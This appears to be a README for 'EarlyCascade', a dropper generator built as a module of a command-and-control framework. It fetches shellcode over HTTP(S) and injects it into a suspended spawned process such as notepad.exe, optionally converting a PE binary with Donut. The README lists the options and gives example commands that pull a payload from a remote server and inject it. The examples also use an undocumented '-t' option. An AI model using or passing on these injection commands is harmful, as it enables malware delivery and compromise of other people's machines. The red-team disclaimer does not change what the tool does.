EarlyCascade is a dropper generator that performs shellcode injection into a newly created process. It allows shellcode to be fetched remotely and supports both Donut-generated shellcode from a PE binary or raw shellcode files.
This dropper is integrated as a module in the Exploration C2 framework.
- Remote shellcode retrieval over HTTP(S)
- Shellcode injection into a spawned process (e.g.,
notepad.exe) - Supports shellcode generation from PE binaries via Donut
EarlyCascade.py -p <process> -u <url> -b <binary> -a <args>
EarlyCascade.py -p <process> -u <url> -r <rawShellcode>-
-h, --helpShow this help message and exit. -
-p, --process <name>Name of the target process to create and inject into (e.g.,notepad.exe). -
-u, --url <url>URL where the dropper will fetch the shellcode from (e.g.,http://your-server/payload.bin). -
-b, --binary <path>Path to a PE binary used to generate shellcode using Donut. -
-a, --args "<arguments>"Optional arguments to pass to the binary when generating shellcode. -
-r, --rawShellcode <path>Path to an existing raw shellcode file. If this is provided, Donut is not used.
# Use Donut to convert calc.exe into shellcode, inject into notepad.exe
EarlyCascade.py -p notepad.exe -u http://192.168.1.5/payload.bin -b ./calc.exe -a "-silent" -t TARGET-HOST
# Use raw shellcode instead, and restrict execution to a host
EarlyCascade.py -p notepad.exe -u http://192.168.1.5/payload.raw -r ./payload.raw -t TARGET-HOST- Either
--binaryor--rawShellcodemust be specified, not both. - Donut must be installed and available in
PATHif using the--binaryoption. - The target process will be spawned in a suspended state for shellcode injection.
This tool is inspired by the original concept from 0xNinjaCyclone's EarlyCascade.
This tool is intended for authorized red teaming, research, and educational purposes only. Unauthorized use is strictly prohibited.